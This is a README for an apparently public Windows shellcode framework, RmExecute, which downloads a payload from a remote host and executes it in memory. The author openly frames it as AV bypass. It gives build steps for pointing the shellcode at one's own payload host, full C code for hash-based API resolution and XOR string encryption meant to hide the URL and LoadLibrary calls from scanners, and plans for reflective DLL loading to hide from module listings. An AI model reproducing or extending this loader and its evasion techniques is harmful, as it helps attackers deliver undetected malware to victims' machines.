Remote Download and Memory Execute for shellcode framework


RmExecute


A shellcode framework that downloads a payload from a remote host and loads it in memory. X64 is not supported yet.

Reference (read: copied) projects

Implementation of a shellcode extraction template on Windows (windows下shellcode提取模板的实现)

The main source: this project uses that author's shellcode framework directly. Reading the doc linked from his article is strongly recommended; the analysis is very good.

PIC_Bindshell

The Windows API hashing part was lifted from here as-is.

ReflectiveDLLInjection

Next on the list to copy.

Development (read: crime) process

Screenshots

bypassAV (screenshot)

How to use

Out of the box

Change host and path in the StartSCode function in ShellCode.cpp to your own domain and payload file, then build and run in Release mode; this writes 123.bin into the project directory. Then build and run in EXE_RUN_MT mode, which loads 123.bin.

Or load 123.bin with a loader of your own.

Adding an API

Use the Get-FunctionsHash.ps1 script in the project directory to compute the hash of the API name and add it to hash.h.

Computing the hash (screenshot)

Then add a matching WINAPI function-pointer typedef in API.H (the function is called through this pointer once its address has been resolved), and add a member of that type to the FUNCTIONS struct in API.H.

Then resolve it in Tool.h -> RmExecute::Initfunctions:

char szUser32[] = { 'u', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0 }; // stack-built string, not a literal (see "Strings" below)
pfn->fnLoadLibraryA(szUser32);                                             // make sure user32.dll is mapped before searching it
pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA); // resolve the export by hash, not by name

This searches the loaded module for the export whose hash matches and stores its address in the struct.

After that the API is called through the struct, for example fn.fnMessageBoxA(0, "text", "text", MB_OK); (the member name must match the one added to FUNCTIONS, and inside the extracted shellcode the two "text" arguments have to be char arrays as well, for the reason given in the next section).

Strings

As the first referenced article explains, every string must be written as an immediate char array such as char s[] = {'a','b','\0'}; rather than a literal. A string literal is placed in .rdata and referenced by absolute address, so it is not part of the extracted .text blob and the shellcode would read garbage (or fault) once it runs outside the original binary. The array form makes the compiler build the bytes on the stack with immediate stores, which travel with the code. Keep such arrays short: for long initializers MSVC may fall back to copying the bytes from .rdata (or to a memcpy/memset call), which breaks the extraction in exactly the same way, so check the disassembly of the extracted function.
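The hash-resolution path described in "Adding an API" together with the string rule above, as an added example that is not RmExecute's code: it implements the ROR13 scheme used by Metasploit's block_api and by PIC_Bindshell (the source of RmExecute's API hashing; that Get-FunctionsHash.ps1 emits exactly these values is an assumption), and resolves an export by hash over a constructed export table with hypothetical addresses standing in for the real PE export directory, so the check runs off-line on any OS. The module name is carried as a char array, the form position-independent code must use.

```c
/* Added example, not code from RmExecute: the ROR13 API-hashing scheme that
 * Metasploit's block_api and PIC_Bindshell use (RmExecute borrows its hashing
 * from PIC_Bindshell; whether Get-FunctionsHash.ps1 uses exactly this scheme
 * is an assumption). A constructed export table stands in for the PE export
 * directory a real loader walks, so the lookup runs off-line on any OS. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

static uint32_t ror13(uint32_t v) { return (v >> 13) | (v << 19); }

/* Module names are hashed as upper-case UTF-16LE including the two-byte NUL
 * (the loader iterates BaseDllName.MaximumLength bytes), so each character
 * costs two ROR13 rounds. */
uint32_t hash_module(const char *module)
{
    uint32_t h = 0;
    for (size_t i = 0; ; i++) {
        unsigned char c = (unsigned char)module[i];
        if (c >= 'a' && c <= 'z') c -= 0x20;
        h = ror13(h) + c;   /* low byte of the UTF-16 code unit */
        h = ror13(h);       /* high byte, always 0 for ASCII names */
        if (c == 0) break;
    }
    return h;
}

/* Export names are hashed as ASCII including the terminating NUL. */
uint32_t hash_function(const char *function)
{
    uint32_t h = 0;
    for (size_t i = 0; ; i++) {
        unsigned char c = (unsigned char)function[i];
        h = ror13(h) + c;
        if (c == 0) break;
    }
    return h;
}

/* The constant that goes into hash.h is the 32-bit sum of the two. */
uint32_t api_hash(const char *module, const char *function)
{
    return hash_module(module) + hash_function(function);
}

/* Constructed stand-in for kernel32's export name table; the addresses are
 * hypothetical. A real resolver reads AddressOfNames / AddressOfNameOrdinals /
 * AddressOfFunctions from IMAGE_EXPORT_DIRECTORY instead. */
typedef struct { const char *name; uintptr_t addr; } export_entry;

static const export_entry kernel32_exports[] = {
    { "ExitProcess",  0x7C81CAFA },
    { "LoadLibraryA", 0x7C801D7B },
    { "VirtualAlloc", 0x7C809AF1 },
    { "WinExec",      0x7C86250D },
};
#define N_EXPORTS (sizeof kernel32_exports / sizeof kernel32_exports[0])

/* GetProcAddressWithHash-style lookup: hash the module once, then rehash each
 * exported name and compare the sum with the wanted constant. Returns 0 when
 * no export matches, which callers must check before jumping to the result. */
uintptr_t resolve_by_hash(const char *module, const export_entry *exports,
                          size_t count, uint32_t wanted)
{
    uint32_t m = hash_module(module);
    for (size_t i = 0; i < count; i++)
        if (m + hash_function(exports[i].name) == wanted)
            return exports[i].addr;
    return 0;
}

/* Sanity check worth running over a generated hash.h: two exports of one
 * module hashing to the same 32-bit value would resolve the wrong function. */
size_t count_hash_collisions(const char *module, const export_entry *exports,
                             size_t count)
{
    size_t collisions = 0;
    for (size_t i = 0; i < count; i++)
        for (size_t j = i + 1; j < count; j++)
            if (api_hash(module, exports[i].name) == api_hash(module, exports[j].name))
                collisions++;
    return collisions;
}

int main(void)
{
    /* Hash generation is a build-time step (what Get-FunctionsHash.ps1 does),
     * so literals are fine here. The char array shows the form the shellcode
     * itself must use when it needs a module name for LoadLibraryA. */
    char k32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0 };
    uint32_t h = api_hash(k32, "LoadLibraryA");   /* 0x0726774C */
    uintptr_t p = resolve_by_hash(k32, kernel32_exports, N_EXPORTS, h);
    printf("HASH_LoadLibraryA = 0x%08X -> %#lx\n", h, (unsigned long)p);
    printf("collisions in table: %zu\n",
           count_hash_collisions(k32, kernel32_exports, N_EXPORTS));
    return p ? 0 : 1;
}
```

The printed constant, 0x0726774C, is the same kernel32!LoadLibraryA hash that appears in Metasploit's block_api. On Windows the table is replaced by the IMAGE_EXPORT_DIRECTORY of the module found by walking PEB->Ldr->InMemoryOrderModuleList; a resolver built that way should also handle forwarded exports (an address that points back into the export section), which a plain RVA lookup does not.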

Roadmap (coming soon)

XOR-encrypt strings

Hides the LoadLibrary and URL signatures from static scanning, making the blob harder to flag.
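One way to implement the XOR string hiding this item describes, as an added example rather than code from RmExecute: a build-time step encodes the string and prints the initializer to paste into the source, and a run-time step decodes it on the stack right before use. The key, the index-dependent mask and the example URL are assumptions.

```c
/* Added example, not RmExecute's code: XOR string hiding for PIC shellcode.
 * Key, mask construction and the sample URL are assumptions for the demo. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define KEY_LEN 4
static const uint8_t KEY[KEY_LEN] = { 0x5A, 0xC3, 0x3E, 0x91 };  /* assumed key */

/* Mask byte i with KEY[i % KEY_LEN] + i. Adding the index breaks the repeating
 * pattern a plain 4-byte key leaves in long strings, and these key bytes keep
 * the mask non-zero for the first ~60 bytes, so no plaintext byte survives.
 * XOR is its own inverse: the same call encodes and decodes, in place. */
void xor_string(uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= (uint8_t)(KEY[i % KEY_LEN] + (uint8_t)i);
}

/* Build-time side: encode plain (NUL included, so the decoded copy is a valid
 * C string) into out and return the encoded length, 0 if it does not fit. */
size_t encode_string(uint8_t *out, size_t cap, const char *plain)
{
    size_t len = strlen(plain) + 1;
    if (len > cap) return 0;
    memcpy(out, plain, len);
    xor_string(out, len);
    return len;
}

/* Print the initializer to paste into the shellcode source in place of the
 * { 'h','t','t','p', ... } form. It must be declared as a local array so the
 * bytes are built on the stack; a static/const array would land in .rdata. */
void emit_initializer(const char *name, const char *plain)
{
    uint8_t enc[256];
    size_t len = encode_string(enc, sizeof enc, plain);
    printf("uint8_t %s[%zu] = {", name, len);
    for (size_t i = 0; i < len; i++)
        printf("%s0x%02X", i ? ", " : " ", enc[i]);
    printf(" };\n");
}

/* Run-time side inside the shellcode: copy the encoded bytes to a stack
 * buffer and decode just before use. Callers should overwrite dst once the
 * API call returns, so the clear text is short-lived in memory. */
size_t decode_to_stack_buffer(char *dst, size_t cap, const uint8_t *enc, size_t len)
{
    if (len > cap) return 0;
    memcpy(dst, enc, len);
    xor_string((uint8_t *)dst, len);
    return len;
}

/* Checks a build script can run: how many bytes still equal the plaintext
 * after encoding (should be 0), and whether encode/decode round-trips. */
size_t unchanged_bytes_after_encode(const char *plain)
{
    uint8_t enc[256];
    size_t len = encode_string(enc, sizeof enc, plain), same = 0;
    for (size_t i = 0; i < len; i++)
        if (enc[i] == (uint8_t)plain[i]) same++;
    return same;
}

int roundtrip_ok(const char *plain)
{
    uint8_t enc[256];
    char dec[256];
    size_t len = encode_string(enc, sizeof enc, plain);
    return len != 0 && decode_to_stack_buffer(dec, sizeof dec, enc, len) == len
                    && strcmp(dec, plain) == 0;
}

int main(void)
{
    const char *url = "http://example.com/123.bin";  /* constructed sample */
    emit_initializer("encUrl", url);
    emit_initializer("encKernel32", "kernel32.dll");
    printf("unchanged bytes: %zu, roundtrip: %d\n",
           unchanged_bytes_after_encode(url), roundtrip_ok(url));
    return roundtrip_ok(url) ? 0 : 1;
}
```

This only defeats string scanning of the blob at rest; once decoded, the URL and the DLL name are in memory in the clear, which is why the decode should happen as late as possible and the buffer be wiped afterwards.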

X64 support

Debug Tool.h -> RunPortableExecutable yourself; roughly, add an X64 macro and swap EAX and friends for RAX (probably). It is more than a register rename, though: on x64 the PEB pointer moves from fs:[0x30] to gs:[0x60], and the calling convention changes to the four-register fastcall with 16-byte stack alignment and shadow space, so the API-calling path needs adjusting too.

Reflective DLL loading

Avoids LoadLibrary entirely: the DLL never appears in the PEB loader lists, so module-enumeration tools such as Process Explorer / procexp64 do not list it (memory scanners that look for executable regions not backed by a file on disk can still find it). It also makes the program modular.

Pure shellcode loading

Too ambitious; just an idea for now.
